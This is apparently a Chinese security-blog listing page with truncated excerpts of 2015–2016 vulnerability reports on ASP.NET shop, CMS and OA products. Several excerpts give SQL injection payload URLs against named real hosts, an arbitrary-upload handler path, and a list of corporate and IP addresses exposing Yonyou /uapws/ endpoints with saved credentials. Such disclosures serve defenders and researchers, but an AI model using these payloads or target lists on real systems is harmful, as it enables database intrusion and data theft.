记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

xpshop网店系统sql注入(demo演示)

漏洞作者: 不能忍 详细说明: 漏洞位置:xpshop.webui.MyRefund protected void Page_Load(object sender, EventArgs e) { if (Utils.request(base.Request.QueryString["type"]) && Utils.request(base.Request.QueryString["Action"])) { string text = base.Request.QueryString["Action"]; if (text != null) { if (
发布时间:2016-02-17 09:20 | 阅读:108277 | 评论:0 | 标签:ASP.NET Sql SQL注入 xpshop 注入 系统 网店

xpshop网店系统sql注入一处(官方demo演示)

漏洞作者: 不能忍 详细说明: 漏洞位置xpshop.webui.Show: private void GetImg(string pids) { ProductDB productDB = new ProductDB(); DataTable thumbnailImg = productDB.GetThumbnailImg(pids); thumbnailImg.TableName = "Products"; base.Response.Write(XpShopJson.DtToJSON(thumbnailImg)); }这里是问题函数,我就不写怎么跟进来的,就是page_load,等下直接用payload测试就好了,官网demo的。 跟进去GetThumbnailImg函数:public Da
发布时间:2016-02-17 09:20 | 阅读:123633 | 评论:0 | 标签:ASP.NET Sql SQL注入 xpshop 漏洞 系统 网店 注入

逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx 有一个全局过滤 asp_code.dll class ZoomlaSecurityCenter public static void CheckUpladFiles() { HttpRequest request = HttpContext.Current.Request; HttpResponse response = HttpContext.Current.Response; if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1) { HttpFileC
发布时间:2015-10-13 19:15 | 阅读:317875 | 评论:0 | 标签:ASP.NET 任意文件上传 逐浪CMS cms

用友多个系统通用漏洞设计缺陷(自带已保存的口令)

漏洞作者: 路人甲 详细说明: 默认密码 其实是根本不用输入密码,账号密码自动保存,点确认就登入了、 导致 源码泄露 可调试 源码 这套 系统很多套用友系统都带着,具体请看 WooYun: 用友多个系统通用漏洞导致接口信息泄露引发多数据库信息泄露(涉及多个大型厂商) 然后从这个得来的灵感 http://gpms.foton.com.cn/uapws/ http://erp.suning.com.cn/uapws/ http://fm2.cscec.com/uapws/ http://bap.ufida.com/uapws/ http://61.178.99.236:9002/uapws/ http://zc.hayao.com:8080/uapws/ http://221.1.83.115:9
发布时间:2015-10-10 23:30 | 阅读:166188 | 评论:0 | 标签:ASP.NET 用友 设计缺陷 通用漏洞 默认密码 漏洞

启莱OA系统sql注入4处

注入一 访问 http://test.oawin.net:5656/client/treelist.aspx?user=’ and (select db_name())>0–&pwd=1 注入二 访问 http://test.oawin.net:5656/client/messageurl.aspx?user=’ and (select db_name())>0–&pwd=1 注入三 访问 http://test.oawin.net:5656/client/GetUser.aspx?user=’ and @@version>0– 注入四 访问 http://test.oawin.net:5656/client/Cl
发布时间:2015-10-04 00:40 | 阅读:101843 | 评论:0 | 标签:ASP.NET 启莱OA 注入

ShopNum1某系统6处高危SQL注入漏洞

朋友分享了下源码,发现shopnum1的ShopNum1HttpModule是处理Http请求的类 上图就是一个注入点,构造链接是/VideoSearchList.aspx?VideoCategoryID= 之后我批量查下使用ShopNum1HttpModule的文件,发现好多问题: http://nrqiang.shopnum1.com/VideoSearchList.aspx?VideoCategoryID=1%20and%20db_name()%3E0– http://nrqiang.shopnum1.com/VideoDetail.aspx?Guid=111%27%20and%20db_name()%3E0– http://nrqiang.shopnum1.com/Produ
发布时间:2015-10-04 00:40 | 阅读:119525 | 评论:0 | 标签:ASP.NET ShopNum1 注入 漏洞

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云